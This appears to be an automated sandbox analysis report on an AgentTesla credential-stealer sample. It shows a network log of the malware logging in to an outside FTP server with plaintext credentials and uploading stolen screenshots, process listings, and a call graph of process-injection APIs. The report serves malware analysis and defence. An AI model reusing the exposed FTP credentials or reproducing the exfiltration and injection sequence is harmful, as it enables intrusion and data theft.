                                                  Oct 31, 2024 17:06:06.854430914 CET2163698110.4.45.197192.168.2.4150 Accepted data connection
                                                  Oct 31, 2024 17:06:06.896873951 CET2163699110.4.45.197192.168.2.4226-File successfully transferred
                                                  226-File successfully transferred226 0.777 seconds (measured here), 71.65 Kbytes per second
                                                  Oct 31, 2024 17:06:07.276645899 CET6369921192.168.2.4110.4.45.197PASV
                                                  Oct 31, 2024 17:06:07.618874073 CET2163699110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,251,65)
                                                  Oct 31, 2024 17:06:07.888298988 CET2163698110.4.45.197192.168.2.4226-File successfully transferred
                                                  226-File successfully transferred226 0.828 seconds (measured here), 67.24 Kbytes per second
                                                  Oct 31, 2024 17:06:07.888360023 CET6369921192.168.2.4110.4.45.197STOR SC_user-494126_2024_12_31_08_18_23.jpeg
                                                  Oct 31, 2024 17:06:07.918616056 CET2163698110.4.45.197192.168.2.4226-File successfully transferred
                                                  226-File successfully transferred226 0.828 seconds (measured here), 67.24 Kbytes per second
                                                  Oct 31, 2024 17:06:08.803329945 CET2163699110.4.45.197192.168.2.4150 Accepted data connection
                                                  Oct 31, 2024 17:06:09.591100931 CET2163699110.4.45.197192.168.2.4226-File successfully transferred
                                                  226-File successfully transferred226 0.788 seconds (measured here), 70.58 Kbytes per second
                                                  Oct 31, 2024 17:06:14.500375032 CET6369821192.168.2.4110.4.45.197PASV
                                                  Oct 31, 2024 17:06:14.846425056 CET2163698110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,203,41)
                                                  Oct 31, 2024 17:06:14.853027105 CET6369821192.168.2.4110.4.45.197STOR SC_user-494126_2025_01_05_17_00_19.jpeg
                                                  Oct 31, 2024 17:06:14.935453892 CET2163709110.4.45.197192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 38 of 50 allowed.
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 38 of 50 allowed.220-Local time is now 00:06. Server port: 21.
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 38 of 50 allowed.220-Local time is now 00:06. Server port: 21.220-This is a private system - No anonymous login
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 38 of 50 allowed.220-Local time is now 00:06. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 38 of 50 allowed.220-Local time is now 00:06. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                  Oct 31, 2024 17:06:14.935595036 CET6370921192.168.2.4110.4.45.197USER origin@haliza.com.my
                                                  Oct 31, 2024 17:06:15.283582926 CET2163709110.4.45.197192.168.2.4331 User origin@haliza.com.my OK. Password required
                                                  Oct 31, 2024 17:06:15.283921003 CET6370921192.168.2.4110.4.45.197PASS JesusChrist007$
                                                  Oct 31, 2024 17:06:15.652872086 CET2163709110.4.45.197192.168.2.4230 OK. Current restricted directory is /
                                                  Oct 31, 2024 17:06:15.773735046 CET2163698110.4.45.197192.168.2.4150 Accepted data connection
                                                  Oct 31, 2024 17:06:15.994519949 CET2163709110.4.45.197192.168.2.4504 Unknown command
                                                  Oct 31, 2024 17:06:15.994956970 CET6370921192.168.2.4110.4.45.197PWD
                                                  Oct 31, 2024 17:06:16.337506056 CET2163709110.4.45.197192.168.2.4257 "/" is your current location
                                                  Oct 31, 2024 17:06:16.337655067 CET6370921192.168.2.4110.4.45.197TYPE I
                                                  Oct 31, 2024 17:06:16.563080072 CET2163698110.4.45.197192.168.2.4226-File successfully transferred
                                                  226-File successfully transferred226 0.788 seconds (measured here), 70.61 Kbytes per second
                                                  Oct 31, 2024 17:06:16.680018902 CET2163709110.4.45.197192.168.2.4200 TYPE is now 8-bit binary
                                                  Oct 31, 2024 17:06:16.680120945 CET6370921192.168.2.4110.4.45.197PASV
                                                  Oct 31, 2024 17:06:17.147088051 CET2163709110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,195,18)
                                                  Oct 31, 2024 17:06:17.165848017 CET6370921192.168.2.4110.4.45.197STOR SC_user-494126_2025_01_12_10_54_19.jpeg
                                                  Oct 31, 2024 17:06:17.995249987 CET6369821192.168.2.4110.4.45.197PASV
                                                  Oct 31, 2024 17:06:18.077034950 CET2163709110.4.45.197192.168.2.4150 Accepted data connection
                                                  Oct 31, 2024 17:06:18.339585066 CET2163698110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,193,254)
                                                  Oct 31, 2024 17:06:18.345312119 CET6369821192.168.2.4110.4.45.197STOR SC_user-494126_2025_01_09_10_10_02.jpeg
                                                  Oct 31, 2024 17:06:18.859827042 CET2163709110.4.45.197192.168.2.4226-File successfully transferred
                                                  226-File successfully transferred226 0.786 seconds (measured here), 76.27 Kbytes per second
                                                  Oct 31, 2024 17:06:19.285250902 CET2163698110.4.45.197192.168.2.4150 Accepted data connection
                                                  Oct 31, 2024 17:06:20.088002920 CET2163698110.4.45.197192.168.2.4226-File successfully transferred
                                                  226-File successfully transferred226 0.803 seconds (measured here), 69.31 Kbytes per second
                                                  Oct 31, 2024 17:06:26.736078978 CET6370921192.168.2.4110.4.45.197PASV
                                                  Oct 31, 2024 17:06:27.080883026 CET2163709110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,195,193)
                                                  Oct 31, 2024 17:06:27.089862108 CET6370921192.168.2.4110.4.45.197STOR SC_user-494126_2025_01_20_03_44_03.jpeg
                                                  Oct 31, 2024 17:06:27.996221066 CET2163709110.4.45.197192.168.2.4150 Accepted data connection
                                                  Oct 31, 2024 17:06:28.778490067 CET2163709110.4.45.197192.168.2.4226-File successfully transferred
                                                  226-File successfully transferred226 0.783 seconds (measured here), 71.08 Kbytes per second
                                                  Oct 31, 2024 17:06:40.485181093 CET6369821192.168.2.4110.4.45.197PASV
                                                  Oct 31, 2024 17:06:40.828809023 CET2163698110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,219,182)
                                                  Oct 31, 2024 17:06:40.834332943 CET6369821192.168.2.4110.4.45.197STOR SC_user-494126_2025_01_21_00_30_37.jpeg
                                                  Oct 31, 2024 17:06:41.783317089 CET2163698110.4.45.197192.168.2.4150 Accepted data connection
                                                  Oct 31, 2024 17:06:42.596257925 CET2163698110.4.45.197192.168.2.4226-File successfully transferred
                                                  226-File successfully transferred226 0.813 seconds (measured here), 68.44 Kbytes per second
                                                  Oct 31, 2024 17:06:46.828071117 CET6369821192.168.2.4110.4.45.197PASV
                                                  Oct 31, 2024 17:06:47.171870947 CET2163698110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,245,152)
                                                  Oct 31, 2024 17:06:47.182044029 CET6369821192.168.2.4110.4.45.197STOR SC_user-494126_2025_01_25_21_36_43.jpeg
                                                  Oct 31, 2024 17:06:48.181260109 CET2163698110.4.45.197192.168.2.4150 Accepted data connection
                                                  Oct 31, 2024 17:06:48.354692936 CET2163698110.4.45.197192.168.2.4150 Accepted data connection
                                                  Oct 31, 2024 17:06:48.947211027 CET2163698110.4.45.197192.168.2.4226-File successfully transferred
                                                  226-File successfully transferred226 0.848 seconds (measured here), 65.60 Kbytes per second
                                                  Oct 31, 2024 17:06:50.578996897 CET6369821192.168.2.4110.4.45.197PASV
                                                  Oct 31, 2024 17:06:50.923458099 CET2163698110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,212,162)
                                                  Oct 31, 2024 17:06:50.929219961 CET6369821192.168.2.4110.4.45.197STOR SC_user-494126_2025_01_29_20_27_16.jpeg
                                                  Oct 31, 2024 17:06:51.842674971 CET2163698110.4.45.197192.168.2.4150 Accepted data connection
                                                  Oct 31, 2024 17:06:52.636862993 CET2163698110.4.45.197192.168.2.4226-File successfully transferred
                                                  226-File successfully transferred226 0.775 seconds (measured here), 71.84 Kbytes per second
                                                  Oct 31, 2024 17:07:10.308928967 CET6369821192.168.2.4110.4.45.197PASV
                                                  Oct 31, 2024 17:07:10.654289961 CET2163698110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,241,80)
                                                  Oct 31, 2024 17:07:10.659734964 CET6369821192.168.2.4110.4.45.197STOR SC_user-494126_2024_10_31_12_07_09.jpeg
                                                  Oct 31, 2024 17:07:11.259382010 CET2163718110.4.45.197192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 41 of 50 allowed.
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 41 of 50 allowed.220-Local time is now 00:07. Server port: 21.
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 41 of 50 allowed.220-Local time is now 00:07. Server port: 21.220-This is a private system - No anonymous login
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 41 of 50 allowed.220-Local time is now 00:07. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 41 of 50 allowed.220-Local time is now 00:07. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                  Oct 31, 2024 17:07:11.259516954 CET6371821192.168.2.4110.4.45.197USER origin@haliza.com.my
                                                  Oct 31, 2024 17:07:11.581873894 CET2163698110.4.45.197192.168.2.4150 Accepted data connection
                                                  Oct 31, 2024 17:07:11.605000019 CET2163718110.4.45.197192.168.2.4331 User origin@haliza.com.my OK. Password required
                                                  Oct 31, 2024 17:07:11.607976913 CET6371821192.168.2.4110.4.45.197PASS JesusChrist007$
                                                  Oct 31, 2024 17:07:11.969383001 CET2163718110.4.45.197192.168.2.4230 OK. Current restricted directory is /
                                                  Oct 31, 2024 17:07:12.318413019 CET2163718110.4.45.197192.168.2.4504 Unknown command
                                                  Oct 31, 2024 17:07:12.318557024 CET6371821192.168.2.4110.4.45.197PWD
                                                  Oct 31, 2024 17:07:12.364481926 CET2163698110.4.45.197192.168.2.4226-File successfully transferred
                                                  226-File successfully transferred226 0.782 seconds (measured here), 75.04 Kbytes per second
                                                  Oct 31, 2024 17:07:12.664740086 CET2163718110.4.45.197192.168.2.4257 "/" is your current location
                                                  Oct 31, 2024 17:07:12.664998055 CET6371821192.168.2.4110.4.45.197TYPE I
                                                  Oct 31, 2024 17:07:13.011112928 CET2163718110.4.45.197192.168.2.4200 TYPE is now 8-bit binary
                                                  Oct 31, 2024 17:07:13.011244059 CET6371821192.168.2.4110.4.45.197PASV
                                                  Oct 31, 2024 17:07:13.357491016 CET2163718110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,199,46)
                                                  Oct 31, 2024 17:07:13.362838984 CET6371821192.168.2.4110.4.45.197STOR SC_user-494126_2024_10_31_12_07_09.jpeg
                                                  Oct 31, 2024 17:07:14.305254936 CET2163718110.4.45.197192.168.2.4150 Accepted data connection
                                                  Oct 31, 2024 17:07:15.123862028 CET2163718110.4.45.197192.168.2.4226-File successfully transferred
                                                  226-File successfully transferred226 0.818 seconds (measured here), 71.75 Kbytes per second

                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:12:02:58
                                                  Start date:31/10/2024
                                                  Path:C:\Users\user\Desktop\rMT103_126021720924.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\rMT103_126021720924.exe"
                                                  Imagebase:0x890000
                                                  File size:818'176 bytes
                                                  MD5 hash:06EF3895BF1C5878463C502A7F1554EB
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1718690777.000000000451A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1718690777.000000000451A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:2
                                                  Start time:12:03:00
                                                  Start date:31/10/2024
                                                  Path:C:\Users\user\Desktop\rMT103_126021720924.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\rMT103_126021720924.exe"
                                                  Imagebase:0x7e0000
                                                  File size:818'176 bytes
                                                  MD5 hash:06EF3895BF1C5878463C502A7F1554EB
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4171996023.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4171996023.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4171996023.0000000002B9C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:false

                                                  General

                                                  Target ID:3
                                                  Start time:12:03:11
                                                  Start date:31/10/2024
                                                  Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                                  Imagebase:0xfd0000
                                                  File size:818'176 bytes
                                                  MD5 hash:06EF3895BF1C5878463C502A7F1554EB
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 32%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:4
                                                  Start time:12:03:12
                                                  Start date:31/10/2024
                                                  Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                                  Imagebase:0x180000
                                                  File size:818'176 bytes
                                                  MD5 hash:06EF3895BF1C5878463C502A7F1554EB
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:5
                                                  Start time:12:03:12
                                                  Start date:31/10/2024
                                                  Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                                  Imagebase:0x10000
                                                  File size:818'176 bytes
                                                  MD5 hash:06EF3895BF1C5878463C502A7F1554EB
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:6
                                                  Start time:12:03:12
                                                  Start date:31/10/2024
                                                  Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                                  Imagebase:0x600000
                                                  File size:818'176 bytes
                                                  MD5 hash:06EF3895BF1C5878463C502A7F1554EB
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.1923594429.0000000002A1C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1916038959.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.1916038959.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1923594429.00000000029F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.1923594429.00000000029F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:10
                                                  Start time:12:03:19
                                                  Start date:31/10/2024
                                                  Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                                  Imagebase:0x470000
                                                  File size:818'176 bytes
                                                  MD5 hash:06EF3895BF1C5878463C502A7F1554EB
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:11
                                                  Start time:12:03:20
                                                  Start date:31/10/2024
                                                  Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                                  Imagebase:0x4a0000
                                                  File size:818'176 bytes
                                                  MD5 hash:06EF3895BF1C5878463C502A7F1554EB
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.4171800763.000000000285C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.4171800763.0000000002831000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.4171800763.0000000002831000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:false

                                                  Disassembly

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:6.8%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:1.3%
                                                    Total number of Nodes:234
                                                    Total number of Limit Nodes:13
                                                    execution_graph 39657 1394668 39658 139467f 39657->39658 39659 139468b 39658->39659 39663 1394798 39658->39663 39668 1393e34 39659->39668 39661 13946aa 39664 13947bd 39663->39664 39672 13948a8 39664->39672 39676 1394898 39664->39676 39669 1393e3f 39668->39669 39684 1395cf4 39669->39684 39671 13970a4 39671->39661 39673 13948cf 39672->39673 39675 13949ac 39673->39675 39680 1394508 39673->39680 39678 13948cf 39676->39678 39677 13949ac 39678->39677 39679 1394508 CreateActCtxA 39678->39679 39679->39677 39681 1395938 CreateActCtxA 39680->39681 39683 13959fb 39681->39683 39683->39683 39685 1395cff 39684->39685 39688 1395d14 39685->39688 39687 1397385 39687->39671 39689 1395d1f 39688->39689 39692 1395d44 39689->39692 39691 1397462 39691->39687 39693 1395d4f 39692->39693 39696 1395d74 39693->39696 39695 1397565 39695->39691 39698 1395d7f 39696->39698 39697 1398b09 39697->39695 39699 1398acb 39698->39699 39702 139ad72 39698->39702 39699->39697 39706 139ce61 39699->39706 39711 139b1b0 39702->39711 39714 139b1a2 39702->39714 39703 139ad86 39703->39699 39707 139ce91 39706->39707 39708 139ceb5 39707->39708 39723 139d428 39707->39723 39727 139d418 39707->39727 39708->39697 39718 139b298 39711->39718 39712 139b1bf 39712->39703 39715 139b1b0 39714->39715 39717 139b298 GetModuleHandleW 39715->39717 39716 139b1bf 39716->39703 39717->39716 39719 139b2b9 39718->39719 39720 139b2dc 39718->39720 39719->39720 39721 139b4e0 GetModuleHandleW 39719->39721 39720->39712 39722 139b50d 39721->39722 39722->39712 39724 139d435 39723->39724 39725 139d46f 39724->39725 39731 139d1f0 39724->39731 39725->39708 39728 139d435 39727->39728 39729 139d46f 39728->39729 39730 139d1f0 GetModuleHandleW 39728->39730 39729->39708 39730->39729 39732 139d1fb 39731->39732 39734 139dd80 39732->39734 39735 139d31c 39732->39735 39734->39734 39736 139d327 39735->39736 39737 1395d74 GetModuleHandleW 39736->39737 39738 139ddef 39737->39738 39738->39734 39948 139d788 DuplicateHandle 39949 139d81e 39948->39949 39739 7842210 39740 784239b 39739->39740 39741 7842236 39739->39741 39741->39740 39744 7842490 PostMessageW 39741->39744 39746 7842488 39741->39746 39745 78424fc 39744->39745 39745->39741 39747 78424fc 39746->39747 39748 784248f PostMessageW 39746->39748 39747->39741 39748->39747 39950 139d540 39951 139d586 GetCurrentProcess 39950->39951 39953 139d5d8 GetCurrentThread 39951->39953 39954 139d5d1 39951->39954 39955 139d60e 39953->39955 39956 139d615 GetCurrentProcess 39953->39956 39954->39953 39955->39956 39959 139d64b 39956->39959 39957 139d673 GetCurrentThreadId 39958 139d6a4 39957->39958 39959->39957 39750 58af096 39751 58af09c 39750->39751 39752 58af01d 39750->39752 39757 58af7e0 39752->39757 39775 58af856 39752->39775 39794 58af7f0 39752->39794 39753 58aef49 39758 58af7e4 39757->39758 39759 58af812 39758->39759 39812 7840a04 39758->39812 39816 784019b 39758->39816 39821 7840418 39758->39821 39825 78404fc 39758->39825 39829 7840972 39758->39829 39833 7840851 39758->39833 39839 7840455 39758->39839 39845 784032b 39758->39845 39849 78402cb 39758->39849 39854 7840622 39758->39854 39859 7840a42 39758->39859 39863 7840262 39758->39863 39867 7840a87 39758->39867 39871 7840a26 39758->39871 39876 78402a5 39758->39876 39759->39753 39776 58af7e4 39775->39776 39778 58af859 39775->39778 39777 58af812 39776->39777 39779 7840a04 2 API calls 39776->39779 39780 78402a5 2 API calls 39776->39780 39781 7840a26 2 API calls 39776->39781 39782 7840a87 2 API calls 39776->39782 39783 7840262 2 API calls 39776->39783 39784 7840a42 2 API calls 39776->39784 39785 7840622 2 API calls 39776->39785 39786 78402cb 2 API calls 39776->39786 39787 784032b 2 API calls 39776->39787 39788 7840455 2 API calls 39776->39788 39789 7840851 2 API calls 39776->39789 39790 7840972 2 API calls 39776->39790 39791 78404fc 2 API calls 39776->39791 39792 7840418 2 API calls 39776->39792 39793 784019b 2 API calls 39776->39793 39777->39753 39779->39777 39780->39777 39781->39777 39782->39777 39783->39777 39784->39777 39785->39777 39786->39777 39787->39777 39788->39777 39789->39777 39790->39777 39791->39777 39792->39777 39793->39777 39795 58af80a 39794->39795 39796 58af812 39795->39796 39797 7840a04 2 API calls 39795->39797 39798 78402a5 2 API calls 39795->39798 39799 7840a26 2 API calls 39795->39799 39800 7840a87 2 API calls 39795->39800 39801 7840262 2 API calls 39795->39801 39802 7840a42 2 API calls 39795->39802 39803 7840622 2 API calls 39795->39803 39804 78402cb 2 API calls 39795->39804 39805 784032b 2 API calls 39795->39805 39806 7840455 2 API calls 39795->39806 39807 7840851 2 API calls 39795->39807 39808 7840972 2 API calls 39795->39808 39809 78404fc 2 API calls 39795->39809 39810 7840418 2 API calls 39795->39810 39811 784019b 2 API calls 39795->39811 39796->39753 39797->39796 39798->39796 39799->39796 39800->39796 39801->39796 39802->39796 39803->39796 39804->39796 39805->39796 39806->39796 39807->39796 39808->39796 39809->39796 39810->39796 39811->39796 39813 7840979 39812->39813 39813->39812 39880 7840f20 39813->39880 39885 7840f30 39813->39885 39817 78401a1 39816->39817 39898 58aea50 39817->39898 39902 58aea44 39817->39902 39906 58ae700 39821->39906 39910 58ae708 39821->39910 39822 7840436 39914 58ae7c8 39825->39914 39918 58ae7c1 39825->39918 39826 78402da 39830 7840978 39829->39830 39831 7840f20 2 API calls 39830->39831 39832 7840f30 2 API calls 39830->39832 39831->39830 39832->39830 39834 7840866 39833->39834 39835 7840639 39833->39835 39834->39759 39837 58ae7c8 WriteProcessMemory 39835->39837 39838 58ae7c1 WriteProcessMemory 39835->39838 39836 784065a 39837->39836 39838->39836 39840 78407d2 39839->39840 39841 7840462 39839->39841 39922 58ae628 39840->39922 39926 58ae630 39840->39926 39842 78407ed 39842->39759 39930 58ae8b8 39845->39930 39934 58ae8b1 39845->39934 39846 7840209 39846->39759 39850 78402d9 39849->39850 39851 78402bc 39849->39851 39850->39759 39851->39850 39852 7840f20 2 API calls 39851->39852 39853 7840f30 2 API calls 39851->39853 39852->39851 39853->39851 39855 7840628 39854->39855 39857 58ae7c8 WriteProcessMemory 39855->39857 39858 58ae7c1 WriteProcessMemory 39855->39858 39856 784065a 39857->39856 39858->39856 39938 7840ed8 39859->39938 39943 7840ee8 39859->39943 39860 7840a41 39860->39859 39865 58ae7c8 WriteProcessMemory 39863->39865 39866 58ae7c1 WriteProcessMemory 39863->39866 39864 7840238 39864->39759 39865->39864 39866->39864 39868 7840a41 39867->39868 39868->39867 39869 7840ed8 2 API calls 39868->39869 39870 7840ee8 2 API calls 39868->39870 39869->39868 39870->39868 39872 7840a2e 39871->39872 39873 7840979 39871->39873 39874 7840f20 2 API calls 39873->39874 39875 7840f30 2 API calls 39873->39875 39874->39873 39875->39873 39877 78402ab 39876->39877 39878 7840f20 2 API calls 39877->39878 39879 7840f30 2 API calls 39877->39879 39878->39877 39879->39877 39881 7840f30 39880->39881 39890 58ae148 39881->39890 39894 58ae142 39881->39894 39882 7840f58 39882->39813 39886 7840f45 39885->39886 39888 58ae148 ResumeThread 39886->39888 39889 58ae142 ResumeThread 39886->39889 39887 7840f58 39887->39813 39888->39887 39889->39887 39891 58ae188 ResumeThread 39890->39891 39893 58ae1b9 39891->39893 39893->39882 39895 58ae148 ResumeThread 39894->39895 39897 58ae1b9 39895->39897 39897->39882 39899 58aead9 39898->39899 39899->39899 39900 58aec3e CreateProcessA 39899->39900 39901 58aec9b 39900->39901 39901->39901 39903 58aead9 39902->39903 39903->39903 39904 58aec3e CreateProcessA 39903->39904 39905 58aec9b 39904->39905 39905->39905 39907 58ae708 VirtualAllocEx 39906->39907 39909 58ae785 39907->39909 39909->39822 39911 58ae748 VirtualAllocEx 39910->39911 39913 58ae785 39911->39913 39913->39822 39915 58ae810 WriteProcessMemory 39914->39915 39917 58ae867 39915->39917 39917->39826 39919 58ae7c8 WriteProcessMemory 39918->39919 39921 58ae867 39919->39921 39921->39826 39923 58ae630 Wow64SetThreadContext 39922->39923 39925 58ae6bd 39923->39925 39925->39842 39927 58ae675 Wow64SetThreadContext 39926->39927 39929 58ae6bd 39927->39929 39929->39842 39931 58ae903 ReadProcessMemory 39930->39931 39933 58ae947 39931->39933 39933->39846 39935 58ae8b8 ReadProcessMemory 39934->39935 39937 58ae947 39935->39937 39937->39846 39939 7840ee8 39938->39939 39941 58ae628 Wow64SetThreadContext 39939->39941 39942 58ae630 Wow64SetThreadContext 39939->39942 39940 7840f13 39940->39860 39941->39940 39942->39940 39944 7840efd 39943->39944 39946 58ae628 Wow64SetThreadContext 39944->39946 39947 58ae630 Wow64SetThreadContext 39944->39947 39945 7840f13 39945->39860 39946->39945 39947->39945

                                                    Executed Functions

                                                    Function 07D3E7E0 Relevance: 11.0, Strings: 8, Instructions: 970COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 294 7d3e7e0-7d3e7ff 295 7d3e805-7d3e80b 294->295 296 7d3e9ad-7d3e9fe 294->296 297 7d3e80d-7d3e814 295->297 298 7d3e84c-7d3e860 295->298 333 7d3ea00-7d3ea0d 296->333 334 7d3ea18-7d3ea32 296->334 302 7d3e816-7d3e823 297->302 303 7d3e82e-7d3e847 call 7d3cfc0 297->303 299 7d3e882-7d3e88b 298->299 300 7d3e862-7d3e866 298->300 305 7d3e8a5-7d3e8c1 299->305 306 7d3e88d-7d3e89a 299->306 300->299 304 7d3e868-7d3e874 300->304 302->303 303->298 304->299 314 7d3e876-7d3e87c 304->314 317 7d3e8c7-7d3e8d2 305->317 318 7d3e969-7d3e98d 305->318 306->305 314->299 323 7d3e8d4-7d3e8da 317->323 324 7d3e8ea-7d3e8f1 317->324 331 7d3e997 318->331 332 7d3e98f 318->332 327 7d3e8de-7d3e8e0 323->327 328 7d3e8dc 323->328 329 7d3e8f3-7d3e8fd 324->329 330 7d3e905-7d3e928 call 7d389d4 324->330 327->324 328->324 329->330 342 7d3e92a-7d3e937 330->342 343 7d3e939-7d3e94a 330->343 331->296 332->331 333->334 340 7d3ea34-7d3ea3b 334->340 341 7d3ea79-7d3ea80 334->341 346 7d3ea55-7d3ea6a 340->346 347 7d3ea3d-7d3ea4a 340->347 344 7d3ea82-7d3ea8f 341->344 345 7d3ea9a-7d3eaa3 341->345 342->343 353 7d3e957-7d3e963 342->353 343->353 354 7d3e94c-7d3e94f 343->354 344->345 350 7d3eaa5-7d3eaa7 345->350 351 7d3eaa9-7d3eaac 345->351 346->341 358 7d3ea6c-7d3ea73 346->358 347->346 355 7d3eaad-7d3eab1 350->355 351->355 353->317 353->318 354->353 359 7d3eab9-7d3eabe 355->359 358->341 361 7d3eb07 358->361 363 7d3eb01-7d3eb04 359->363 364 7d3eac0-7d3eac7 359->364 362 7d3eb0a-7d3eb32 361->362 372 7d3eb39-7d3eb70 362->372 365 7d3eae1-7d3eaf6 